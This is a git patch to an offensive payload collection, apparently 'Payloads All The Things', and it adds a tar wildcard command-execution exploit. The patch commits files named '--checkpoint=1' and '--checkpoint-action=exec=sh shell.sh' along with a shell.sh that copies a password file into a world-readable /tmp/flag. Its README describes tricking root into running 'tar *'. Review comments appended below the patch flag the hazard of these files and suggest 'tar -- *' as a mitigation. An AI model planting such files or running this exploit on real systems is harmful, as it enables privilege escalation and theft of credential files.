From bed3967509bda62937c806bf1573b4f904ea1f6a Mon Sep 17 00:00:00 2001 From: swisskyrepo Date: Tue, 18 Oct 2016 18:36:18 +0700 Subject: [PATCH] Tar command exec --- README.md | 6 +++--- TAR_Code_Exec/--checkpoint-action=exec=sh shell.sh | 0 TAR_Code_Exec/--checkpoint=1 | 0 TAR_Code_Exec/README.md | 14 ++++++++------ TAR_Code_Exec/shell.sh | 3 +++ 5 files changed, 14 insertions(+), 9 deletions(-) create mode 100755 TAR_Code_Exec/--checkpoint-action=exec=sh shell.sh create mode 100755 TAR_Code_Exec/--checkpoint=1 create mode 100755 TAR_Code_Exec/shell.sh diff --git a/README.md b/README.md index 6831bc4..00663cc 100644 --- a/README.md +++ b/README.md @@ -1,11 +1,9 @@ # Payloads All The Things -A list of every usefull payloads and bypass for Web Application Security +A list of usefull payloads and bypasses for Web Application Security TODO: * XSS -* Upload * Traversal Directory -* Tar * PHP Serialization * CSV Injection @@ -14,5 +12,7 @@ To improve: * SQL injection * XXE * SSRF +* Upload +* Tar command exec # /!\ Work in Progress : 1% diff --git a/TAR_Code_Exec/--checkpoint-action=exec=sh shell.sh b/TAR_Code_Exec/--checkpoint-action=exec=sh shell.sh new file mode 100755 index 0000000..e69de29 diff --git a/TAR_Code_Exec/--checkpoint=1 b/TAR_Code_Exec/--checkpoint=1 new file mode 100755 index 0000000..e69de29 diff --git a/TAR_Code_Exec/README.md b/TAR_Code_Exec/README.md index c707ab4..d842476 100644 --- a/TAR_Code_Exec/README.md +++ b/TAR_Code_Exec/README.md 
@@ -1,12 +1,14 @@ -# Title -Lorem +# TAR Command Execution +By using tar with –checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and that’s where the wildcard comes in handy. -## Vuln +## Exploit +These files work against a "tar *" ``` -Code +--checkpoint=1 +--checkpoint-action=exec=sh shell.sh +shell.sh (your exploit code is here) ``` ## Thanks to -* Lorem -* Ipsum \ No newline at end of file +* \ No newline at end of file diff --git a/TAR_Code_Exec/shell.sh b/TAR_Code_Exec/shell.sh new file mode 100755 index 0000000..8473b30 --- /dev/null +++ b/TAR_Code_Exec/shell.sh @@ -0,0 +1,3 @@ +#!/bin/bash +cat /passwd > /tmp/flag +chmod 777 /tmp/flag \ No newline at end of file
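Review bot: In the README.md hunk, the rewritten description line still spells "usefull"; since the line is already being changed, correct it to "useful". The same hunk replaces the TODO entry "Tar" with "Tar command exec" under "To improve", while the directory this patch fills in is TAR_Code_Exec; using one name in both places would make the list easier to match to the tree.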
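Review bot: The two new empty files in TAR_Code_Exec, "--checkpoint=1" and "--checkpoint-action=exec=sh shell.sh", are committed under option-like names, so anyone who runs tar with an unquoted * inside a checkout of that directory will have them read as options and shell.sh executed. State that hazard at the top of TAR_Code_Exec/README.md, or describe the file names there instead of committing them. Mode 100755 on zero-length files is also unnecessary.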
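Review bot: In the TAR_Code_Exec/README.md hunk, the intro writes the option as "–checkpoint-action" with a typographic dash and curly quotes, which does not match the literal "--checkpoint-action=exec=sh shell.sh" in the code block below it; use plain ASCII "--" and straight quotes. The code block should say that its three lines are file names placed in the directory being archived, and the "Thanks to" section is left as an empty bullet and should either credit a source or be dropped. A short mitigation line would also make the page useful to defenders, for example that "tar -- *" or "tar ./*" keeps file names from being parsed as options.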
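Review bot: In TAR_Code_Exec/shell.sh, the "#!/bin/bash" line has no effect because the checkpoint action runs the file as "sh shell.sh"; drop the shebang or use "#!/bin/sh" so the header matches how the script is invoked. "chmod 777 /tmp/flag" grants write and execute to everyone where read access is all the demonstration needs. The script also has no comment stating what it demonstrates, and the file ends without a trailing newline.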